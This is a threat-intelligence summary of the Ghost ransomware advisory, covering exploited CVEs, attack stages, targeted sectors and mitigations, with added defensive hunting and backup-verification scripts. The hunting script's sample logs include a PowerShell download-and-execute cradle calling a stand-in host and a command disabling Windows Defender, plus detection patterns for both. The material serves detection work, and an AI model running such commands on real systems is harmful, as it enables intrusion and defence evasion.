CTI: Ghost in the Machine

Urgent Threat Advisory: Ghost Ransomware Campaign Targeting Backup Systems – Critical Infrastructure at Risk

Summary

A ransomware campaign tracked as Ghost (also known as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture) has been actively targeting organizations across multiple industry sectors in over 70 countries. The FBI and CISA have issued a joint advisory (CISA alert AA25-022A, published February 2025) warning about this group's attack methodology. Unlike ransomware campaigns that rely on phishing for initial access, Ghost gains entry by exploiting known, often years-old vulnerabilities in internet-facing software and firmware, then moves to compromise backup systems and cripple an organization's ability to recover without paying.

Key Attack Techniques

The Ghost ransomware group employs a multi-stage attack process, including:

  1. Exploitation of Vulnerabilities:

    • Ghost primarily targets unpatched vulnerabilities in publicly exposed applications and systems.

    • Notable products exploited include:

      • Fortinet FortiOS appliances

      • Adobe ColdFusion

      • Microsoft SharePoint

      • Microsoft Exchange (including the ProxyShell attack chain)

    • Notable CVEs targeted by Ghost (all are old and have vendor patches available):

      • CVE-2018-13379 (Fortinet FortiOS SSL VPN path traversal, used to read VPN credentials)

      • CVE-2009-3960 and CVE-2010-2861 (Adobe ColdFusion)

      • CVE-2019-0604 (Microsoft SharePoint remote code execution)

      • CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (Microsoft Exchange ProxyShell chain)

  2. Web Shell Deployment:

    • After gaining access, attackers upload a web shell to compromised servers to maintain persistence.

  3. Privilege Escalation:

    • Attackers use the Windows Command Prompt and PowerShell to download and run additional tooling, then escalate privileges, often by stealing process tokens to impersonate the SYSTEM user and re-launch their payloads with elevated rights.

  4. Cobalt Strike Abuse:

    • The group uses Cobalt Strike to deploy Beacons for command-and-control (C2) purposes and to execute additional malicious payloads.

    • Ghost actors use Cobalt Strike's built-in hashdump function to collect credentials and password hashes.

    • They also disable security defenses such as Windows Defender on compromised hosts to evade detection.

  5. Targeting Backup Systems:

    • Ghost focuses on compromising and corrupting backup infrastructure to prevent organizations from recovering data without paying a ransom.
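The five stages above map to a handful of host and web-server indicators that a defender can hunt for. The following is an added example, not code from the advisory or the Forbes article: a small Python hunting script run over constructed sample telemetry (an IIS-style access log from an internet-facing Exchange host and process-creation records in a simplified key=value form, both invented for this example). The allowlisted application paths and the regex indicators are assumptions that would need tuning to a real environment; the web-shell and Defender-tampering patterns are generic for the techniques listed, not Ghost-specific signatures.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry for the example (not real incident data).
SAMPLE_WEB_LOG = "\n".join([
    "2025-02-20 09:14:02 203.0.113.7 GET /owa/auth/logon.aspx 200",
    "2025-02-20 09:14:05 203.0.113.7 POST /aspnet_client/system_web/shell.aspx 200",
    "2025-02-20 09:14:09 203.0.113.7 POST /aspnet_client/system_web/shell.aspx 200",
    "2025-02-20 09:15:11 198.51.100.9 GET /owa/ 200",
])
SAMPLE_PROCESS_LOG = "\n".join([
    '2025-02-20 09:14:06 host=EXCH01 parent=w3wp.exe image=cmd.exe cmdline="cmd.exe /c whoami"',
    '2025-02-20 09:14:20 host=EXCH01 parent=w3wp.exe image=powershell.exe cmdline="powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.7/a\')"',
    '2025-02-20 09:16:40 host=EXCH01 parent=powershell.exe image=powershell.exe cmdline="powershell Set-MpPreference -DisableRealtimeMonitoring $true"',
    '2025-02-20 09:20:01 host=EXCH01 parent=explorer.exe image=notepad.exe cmdline="notepad.exe notes.txt"',
])


@dataclass
class Finding:
    stage: str    # stage of the attack chain the indicator maps to
    line: str     # the raw log line that triggered it
    reason: str


# Assumed paths that legitimately receive POSTs on an Exchange/SharePoint front end.
KNOWN_POST_PREFIXES = ("/owa/", "/ecp/", "/ews/", "/mapi/", "/autodiscover/", "/_layouts/")
SCRIPT_EXT = re.compile(r"\.(aspx|ashx|asmx|cfm|cfc|jsp|php)(\?|$)", re.I)
WEB_LINE = re.compile(r"^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$")
PROC_LINE = re.compile(r'^(?P<ts>\S+ \S+) host=(?P<host>\S+) parent=(?P<parent>\S+) '
                       r'image=(?P<image>\S+) cmdline="(?P<cmdline>.*)"$')

WEB_SERVER_PROCS = {"w3wp.exe", "coldfusion.exe", "httpd.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Commands that turn off or hollow out Windows Defender (real cmdlets / sc.exe usage).
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable|Add-MpPreference\s+-Exclusion|sc(\.exe)?\s+stop\s+WinDefend", re.I)
# Classic PowerShell download-and-execute cradles used to stage a second payload.
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I)


def hunt_web_log(text):
    """Flag POSTs to server-side scripts outside the known application paths (web shell use)."""
    findings = []
    for line in text.splitlines():
        m = WEB_LINE.match(line)
        if not m:
            continue
        path = m["path"].lower()
        if m["method"] == "POST" and SCRIPT_EXT.search(path) and not path.startswith(KNOWN_POST_PREFIXES):
            findings.append(Finding("web_shell", line, f"POST to script {path} outside known app paths"))
    return findings


def hunt_process_log(text):
    """Flag web-server worker spawning a shell, download cradles, and Defender tampering."""
    findings = []
    for line in text.splitlines():
        m = PROC_LINE.match(line)
        if not m:
            continue
        parent, image, cmd = m["parent"].lower(), m["image"].lower(), m["cmdline"]
        if parent in WEB_SERVER_PROCS and image in SHELLS:
            findings.append(Finding("web_shell", line, f"{parent} spawned {image}"))
        if image in SHELLS and DOWNLOAD_CRADLE.search(cmd):
            findings.append(Finding("c2_staging", line, "download-and-execute cradle in command line"))
        if DEFENDER_TAMPER.search(cmd):
            findings.append(Finding("defense_evasion", line, "Windows Defender tampering command"))
    return findings


def hunt(web_log, process_log):
    return hunt_web_log(web_log) + hunt_process_log(process_log)


def stages_seen(findings):
    """Distinct attack-chain stages observed, sorted, for a quick triage summary."""
    return sorted({f.stage for f in findings})


if __name__ == "__main__":
    results = hunt(SAMPLE_WEB_LOG, SAMPLE_PROCESS_LOG)
    for f in results:
        print(f"[{f.stage}] {f.reason}\n    {f.line}")
    print("stages observed:", stages_seen(results))
```

On the sample data the script reports six findings across three stages: the two POSTs to an unexpected .aspx, w3wp.exe spawning cmd.exe and powershell.exe, the PowerShell download cradle, and the Set-MpPreference call that disables real-time monitoring. Seeing the web-shell and defense-evasion stages together on one internet-facing host within minutes is the pattern worth paging on, since the advisory notes these actors move quickly from access to ransomware deployment.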

Industry Sectors Targeted

Ghost ransomware attacks have impacted critical infrastructure across multiple sectors, including:

  • Financial Institutions: Leading to operational disruptions and financial losses.

  • Municipal Governments: Service interruptions have affected entire communities.

  • Healthcare Organizations: The inability to restore critical patient data poses severe risks to patient care and operational continuity.

Impact and Observations

  • While Ghost often claims to exfiltrate data for sale, the FBI notes limited evidence of significant data theft (e.g., intellectual property or PII) beyond backup corruption.

  • The group appears focused on ensuring that recovery from attacks is impossible without paying a ransom or facing extended downtime.

Expert Insights

  1. Juliette Hudson, CTO at CybaVerse:

    • Emphasizes the importance of prioritizing patching and remediation efforts to mitigate risk from known vulnerabilities.

  2. Darren Guccione, CEO of Keeper Security:

    • Recommends proactive risk management, including the adoption of privileged access management and zero-trust frameworks.

  3. Joe Silva, CEO at Spektion:

    • Warns that “patch fatigue” and overwhelmed security teams create gaps that attackers are exploiting.

  4. Rom Carmel, CEO at Apono:

    • Highlights the importance of limiting privileges and enforcing precise, rightsized access to sensitive resources to reduce the impact of credential theft.

  5. Agnidipta Sarkar, VP CISO Advisory at ColorTokens:

    • Stresses the need to prevent lateral movement in networks by better understanding how attackers gain access.

  6. Tim Mackey, Head of Software Supply Chain Risk at Black Duck:

    • Advises organizations to create a long-term operations plan for legacy and IoT devices to ensure patch availability and active threat scenario sharing.

Recommended Mitigation Steps

The FBI and CISA recommend taking the following urgent actions to mitigate the risks posed by the Ghost ransomware campaign:

  1. Maintain Regular Backups:

    • Store backups separately from source systems (offline or otherwise immutable) so they cannot be altered or encrypted by compromised devices, and test restores regularly.

  2. Patch Known Vulnerabilities:

    • Apply security updates to operating systems, software, and firmware in a timely manner.

    • Prioritize patching of critical CVEs listed above.

  3. Segment Networks:

    • Restrict lateral movement from initial infected devices by segmenting networks.

  4. Implement Phishing-Resistant MFA:

    • Enforce multi-factor authentication (MFA) for all privileged accounts and email services to reduce the risk of account compromise.

  5. Least Privilege Access:

    • Implement a least-privilege access model to minimize access rights for accounts, users, and systems.

  6. Allowlisting:

    • Allowlist applications, scripts, and network traffic to prevent unauthorized execution and access.
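Because this campaign's leverage comes from corrupting backups, the first mitigation is only useful if you can tell a tampered backup set from a good one before you need it. The following is an added example, not code from the advisory or any backup product: a Python script that builds a keyed manifest (HMAC-SHA256) over a backup directory and later verifies it, reporting files that were modified, deleted, or added. The key is assumed to live only on an isolated verification host, never on the backup server itself, which is what makes the manifest trustworthy even if the backup server is fully compromised. The backup files, the tampering, and the directory layout are constructed inside the script for demonstration.

```python
import hashlib
import hmac
import os
import tempfile
from pathlib import Path


def hmac_file(path, key):
    """Keyed digest of one file, streamed so large backup archives are not read into memory."""
    h = hmac.new(key, digestmod=hashlib.sha256)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def _digest_tree(backup_dir, key):
    root = Path(backup_dir)
    return {p.relative_to(root).as_posix(): hmac_file(p, key)
            for p in sorted(root.rglob("*")) if p.is_file()}


def build_manifest(backup_dir, key):
    """Run right after a backup job completes; store the result off the backup host."""
    return _digest_tree(backup_dir, key)


def verify_manifest(backup_dir, manifest, key):
    """Compare the current backup tree against a previously stored manifest."""
    current = _digest_tree(backup_dir, key)
    result = {
        "missing": sorted(set(manifest) - set(current)),
        "unexpected": sorted(set(current) - set(manifest)),
        # compare_digest avoids timing leaks; a plain hash (no key) would let an attacker
        # who controls the backup host simply recompute a matching manifest.
        "modified": sorted(name for name in manifest
                           if name in current and not hmac.compare_digest(current[name], manifest[name])),
    }
    result["ok"] = not (result["missing"] or result["unexpected"] or result["modified"])
    return result


def demo():
    """Constructed scenario: a clean backup set, then the same set after hostile tampering."""
    key = os.urandom(32)  # assumption: generated and held on the isolated verification host
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "db").mkdir()
        (root / "db" / "prod.sql.gz").write_bytes(b"constructed backup payload 1")
        (root / "files.tar").write_bytes(b"constructed backup payload 2")

        manifest = build_manifest(root, key)
        clean = verify_manifest(root, manifest, key)

        # Simulate what a compromised backup server looks like: one archive overwritten
        # with ciphertext, one deleted, and a ransom note dropped in.
        (root / "db" / "prod.sql.gz").write_bytes(b"encrypted garbage")
        (root / "files.tar").unlink()
        (root / "README_TO_RESTORE.txt").write_bytes(b"ransom note")
        tampered = verify_manifest(root, manifest, key)
    return clean, tampered


if __name__ == "__main__":
    before, after = demo()
    print("before tampering:", before)
    print("after tampering: ", after)
```

Run the verification from the isolated host on a schedule and alert on any non-empty result; a backup that fails verification should be treated as lost, and the alert itself is an early signal that an intruder has reached the backup tier, which in this campaign typically precedes encryption of production systems.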

Conclusion

The Ghost ransomware campaign represents a dangerous escalation in ransomware tactics, focusing on disabling backup infrastructure and preventing recovery rather than merely encrypting data. Organizations must act quickly to patch vulnerabilities, segment their networks, and implement robust access controls to reduce the risk of falling victim to these attacks.

If you want to read more, this CTI summary is based on Davey Winder's coverage of the advisory in Forbes.